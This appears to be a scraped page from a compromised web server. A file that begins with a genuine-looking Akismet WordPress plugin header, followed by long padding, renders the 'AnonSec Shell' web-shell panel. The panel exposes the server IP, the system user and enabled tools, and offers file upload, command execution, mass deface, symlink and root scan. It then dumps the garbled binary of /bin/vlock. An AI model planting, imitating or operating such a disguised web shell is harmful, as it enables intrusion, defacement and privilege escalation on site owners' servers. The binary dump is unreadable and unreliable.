#/** * @package Akismet */ /* Plugin Name: Akismet Anti-spam: Spam Protection Plugin URI: https://akismet.com/ Description: Used by millions, Akismet is quite possibly the best way in the world to protect your blog from spam. Akismet Anti-spam keeps your site protected even while you sleep. To get started: activate the Akismet plugin and then go to your Akismet Settings page to set up your API key. Version: 5.4 Requires at least: 5.8 Requires PHP: 7.2 Author: Automattic - Anti-spam Team Author URI: https://automattic.com/wordpress-plugins/ License: GPLv2 or later Text Domain: akismet */ /* This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. Copyright 2005-2025 Automattic, Inc. */ // Make sure we don't expose any info if called directly . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . AnonSec Shell
AnonSec Shell
Server IP : 62.109.13.187  /  Your IP : 216.73.216.11   [ Reverse IP ]
Web Server : Apache/2.4.6 (CentOS) mpm-itk/2.4.7-04 OpenSSL/1.0.2k-fips PHP/8.2.28
System : Linux robothost.ru 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : mosrembit ( 6064)
PHP Version : 8.2.28
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/self/root/bin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /proc/self/root/bin/vlock
ELF>@@�7@8	@@@@@@��88@8@@@<-<- �-�-`�-`� ..`.`��TT@T@DDP�td�)�)@�)@��Q�tdR�td�-�-`�-`/lib64/ld-linux-x86-64.so.2GNU GNU����C����v��ބA�4��  P47<(�BE���|�Pv��qX�bA����9������25<�����Z�h���?�����M (
 ���_��RF�4L��g)p�u�2`N�2`k4`7�2`U�2`�!�2`HX@��2`B%@libpam.so.0__gmon_start__pam_set_itempam_setcredpam_startpam_strerrorpam_acct_mgmtpam_chauthtokpam_endpam_authenticatelibpam_misc.so.0misc_convlibc.so.6fflush__printf_chkexitsetlocalestrncmp__strdupdcgettextgetpwuidputssigprocmask__stack_chk_failendpwentisattygetpwnamsigemptysetopenlog__errno_locationread__syslog_chkttyname__fprintf_chksigaddsetstdoutlseekmallocgetenvstderrioctlgetuidgetopt_long__fxstatfwritesigactioncloseopenprogram_invocation_short_namesleep__sprintf_chkbindtextdomain__libc_start_mainfree__progname_fini_init_edata__bss_startLIBPAM_MISC_1.0LIBPAM_1.0GLIBC_2.3.4GLIBC_2.4GLIBC_2.2.5� Ш?	a `/hq�ti	|ii
�ui	��/`�1`�2`7�2`4�2`;0` 0`(0`00`80`@0`H0`P0`X0`	`0`
h0`p0`x0`
�0`�0`�0`�0`�0`�0`�0`�0`�0`�0`�0`�0`�0`�0`�0`�0`1`1` 1`!1`" 1`#(1`$01`%81`&@1`'H1`(P1`)X1`*`1`+h1`,p1`-x1`.�1`/�1`0�1`1�1`2�1`3H��H�� H��t��H����5� �%� @�%� h����%z h�����%r h����%j h����%b h����%Z h����%R h����%J h�p����%B h�`����%: h	�P����%2 h
�@����%* h�0����%" h� ����% h
�����% h�����%
 h���% h����%� h�����%� h����%� h����%� h����%� h����%� h����%� h�p����%� h�`����%� h�P����%� h�@����%� h�0����%� h� ����%� h�����%� h�����%� h���%� h ����%z h!�����%r h"����%j h#����%b h$����%Z h%����%R h&����%J h'�p����%B h(�`����%: h)�P����%2 h*�@����%* h+�0����%" h,� ����% h-�����% h.�����%
 h/���% h0����%� h1����AUATUH���X&@S���H��(dH�%(H�D$1��/�D$/devf�D$������(@�)@�a����)@�7�����H���1����H��H����H�t$H�Ǻ���H�S��HD���	� H�ž�}&@���1�H��H���H��I��txH���
��tb�,���A����I��H��I��1�� )@��D�,$�1���H��H��L���S���H�L$dH3%(��uH��([]A\A]�1�L�������;��������
)@1��u���1�H�¿1�����1�I��^H��H���PTI�%@H��$@H�ǰ@����f.���2`UH-�2`H��H��w]øH��t�]��2`�����2`UH-�2`H��H��H��H��?H�H�u]úH��t�]H�ƿ�2`����=� uUH���~���]�� ��@H�= t�H��tU�.`H���]�{����s���AWAVAUI��ATI��UH��SH�����A�ƐH�����
� ������h%@1��(���L��H�ƿ1��f���H�=? �
���1�H������������������R�P ��u1��Y������U����H���g���fD�L��L���xH��H���E���E��M��L��1��0%@��������>&@1��\���H������H�=} �H����
�>����@1��Y&@�,���L��H��L��1���g����� ����1����%@���H���p���������u\1�H���z��������O������H���
����v&@H�¿1����H�=� �����H��������fD1���������H�������v&@H�¿1����H�=� �O������f.���H�������&@H��I�Ǿ1���z���L���v&@�1��V���H�=/ ���H��������
����9�����H�������������H��1������D�4$M��M��H����%@1������H��1�[]A\A]A^A_�fD� H���c���������H���o����JD�4$M��M��H���&@1������H���[]A\A]A^A_�UH��H���}&@S�Ӻ�1`H��H��H�$dH�%(H�D$1��(�����t\��u8�+����0��&@1�1��;���1�H�L$dH3%(��H��[]�fD1���&@����1���fDH�<$H�������H�$��t��ۉ�H��t0�����&@H����1����H�<$���K���1��k���������&@H��1�1�1�������5���D�
� ��&@��u�w ��&@�Һ)@HD���f�U��SH��H��E1���1`��&@H�މ�������tA��c��~v��ht9��v��H�=� ��&@��&@�1��S���1��,���@H��[]ÐH�� ���&@1��X����H��H��H��1����1����@��au�� �O���@H�9 ���(@1�����H�=9 H��H�پ1��������D�N ����S1��H���� ����dH�%(H��$�1�H�H��Ƅ$�H��$��[Jf��$�������t�D$%�= t@H��$��
���H��$�dH3%(�H��[�f�L�D$(L��H��H��u�H��$�E����(@��1�����H��$�1���X������� �j������2`���Y���H��t"�=� ���E���� ����� �����1����=� ���2`����H��u��� �� ��ƒ�Hc�H���E���H��H�� t��=C H��H�����H9�����H�=p �S�H�` �`����.�@f.�H�=@ tNS�� 1�1����D�H����t
[�W�����2`�q�H��t[�=� �/����fD�=� ���2`�;�H��u��� �� H�5� �=j ��ƒ�Hc��
���SH���v��(@���J�H��tH�����H��t9Xt�����H��t"H�8��H��t7H�D$� �H�D$H��[ú��(@1����1�H�¿1��C���0��(@�1��+�f.���=� ��V1��	�f��=� 1ҾV1����f�f.�SH���H��@dH�%(H�D$81�H�|$ H�/dev/tty�D$(H�D$ 1�����/ ���Ǻ4`1��V����
�| D�q E�����`3`1��H���H��h3`��D�
E �+ E����H�� 1Ҿ`3`�
�>�1Ҿ`3`��-�1Ҿ`3`���1Ҿ`3`���1Ҿ`3`���1Ҿ`3`�
���1Ҿ`3`����1Ҿ`3`����1Ҿ`3`���1Ҿ`3`���1Ҿ`3`���1Ҿ`3`���1Ҿ`3`��r�1Ҿ`3`��a�1Ҿ`3`��P��2`�v���2`��1�1Ҿ�2`���=� ��u?�� ���u H�\$8dH3%(�H��@[�fD�D$�w����D$�ѐH�� �=7 �H�T$�
H�D$f�t$1��V�D$f�L$�t��y��K��0�U)@1�1��[�1��t���@1Ҿ`3`�
H�� �@�d�1Ҿ`3`�H�� �@�H���2`�n�
��2`����2`��1Ҿ�2`���D�� H�= E�����������=F ���7 �����>���fD�s��0H�L$ 1��C)@1��~�1�����1���h)@�f ���H�= H��H��1����D�= E��u0H�
� ���V&@�e�H�=� �����@�=� �� �����)@1��i �����`�H�=� H�¾1���1������^�@f.��� ��u�DH�������� ��u
H�����=�
 �4`�V1�H���U�DAWA��AVI��AUI��ATL�%8	 UH�-8	 SL)�1�H��H����H��t�L��L��D��A��H��H9�u�H��[]A\A]A^A_Ðf.���H��H���Authentication problems on %s for %s by (uid=%u)The entire console display is now completely locked by %s.
Use Alt-function keys to switch to other virtual consoles.Unlocked %s on %s for %s by (uid=%u)Cancelled lock of %s on %s for %s by (uid=%u)Please try again later.


The %s is now locked by %s.
%s.


vlockpam_start failed: %mpam_startpam_set_item: %sconsoleVCacvh1.15.5%s
currentallversionhelp%s: locks virtual consoles, saving your current session.
Usage: %s [options]
       Where [options] are any of:
-c or --current: lock only this virtual console, allowing user to
       switch to other virtual consoles.
-a or --all: lock all virtual consoles by preventing other users
       from switching virtual consoles.
-v or --version: Print the version number of vlock and exit.
-h or --help: Print this help message and exit.
Try `%s --help' for more information.
/dev/vcsa%uLOGNAMEunrecognized userstrdup/usr/share/localekbdstdin is not a ttyLocked %s on %s for %s by (uid=%u)could not open %sioctl VT_SETMODEThis tty (%s) is not a virtual console.
The entire console display cannot be locked.
;������XT��H���h���������h���0����(����H������������H���XzRx���*zRx�$��0FJw�?;*3$"dD@�MB�B�B �E(�D0�D8�DP�
8C0A(B BBBGM8F0A(B BBB,�(�A�L�K0W
AAG��',� �A�C�G a
AAB$$��A�N��
AJ$L��K�Y
�LV�Z�$t0�A�D T
AA<���lB�B�A �I(�KP
(A ABBA�h��p�$x�2A�LP
AG4����KTS
IVDT����eB�E�E �E(�H0�H8�M@l8A0A(B BBB����@�@��X@
%@�-`�-`���o�@�@�@
�0`��@0@x	���o�@���o�o6@.`�@�@�@�@�@�@�@@@&@6@F@V@f@v@�@�@�@�@�@�@�@�@@@&@6@F@V@f@v@�@�@�@�@�@�@�@�@@@&@6@F@V@f@v@�@�@�@�&@c�&@a�&@v�&@h��������vlock.debug�o�t�7zXZ�ִF!t/���]?�E�h=��ڊ̓�N��� =�M]`U��@Q�Ǥ����wZ�|�|���Z��P]{��#o�l�O��%#��%I�X���?������c�N�4LٍJ~h)�m�B���[ܴLG�����	zLG�QA�f�V����y��jHI���IACLn�8SE郏k�Si��Y��y[<�ir_16
0+9Lj�z���_�W7
�q6�2��\�2�it�F:��3�7E�g�r��7Tf
� [�]��I�A�$��䴑
uB��J�1Z�,W�^���`�O��5��$��E��y����	�Z�~�����<���V�*NJI�t���e�ₗ($r4_��y/<�o�&T���s
���N���rՉ��* <>�i�JU��2m��v�q����ݽ=��K��"�Ʃ�!�˶�+O!ޓ�v&:o�ա)5\g�>̈́��+ܺ�'�-#��w^���
��쳆�p},bQ>FOh	�4(?�S!�,�yM�M����&���hBŁ��l]�B=H�k�S��<����6<�JvWa9����b}L�W+��I|���
���c�jlw\�ܾDZz�v��T9�[�0�꽫<Z��e�PPc��"��BX �3y�&e�ˑ��`c��a�K�q��
���J�����ʣ*��	G@��iB�]�j2�d�9KS�{n�aK�䗖�?��u u��*�Z�P�xB(����&��]�W�)A�G�^OsH��-Ls@E+�f?s�jo�lTڗvB���]+��:#+��.�u��iՑ����_�!�D����I��,� G�zU�ap.���XJ���\��Y�Tv�:���?�؁����ԕ�L��,���i�5m�Y��e.q��a�>RA��~T�Z4*N�^ͧϒn�[!�i,-π��`8�ͩS	$zէ/)nbՠ�U�.��.�� |��a��g�YZ.shstrtab.interp.note.ABI-tag.note.gnu.build-id.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.jcr.dynamic.got.got.plt.data.bss.gnu_debuglink.gnu_debugdata8@8T@T !t@t$4���o�@�H>�@��F�@��N���o6@6z[���o�@��j0@0xtB�@��~X@Xy�@�0��@�b�%@%	� %@ %���)@�)��X*@X*���-`�-��-`�-�.`.�.`.���/`�/�0`0���1`�1� ��2`�2h ��2��2�6


Anon7 - 2022
AnonSec Team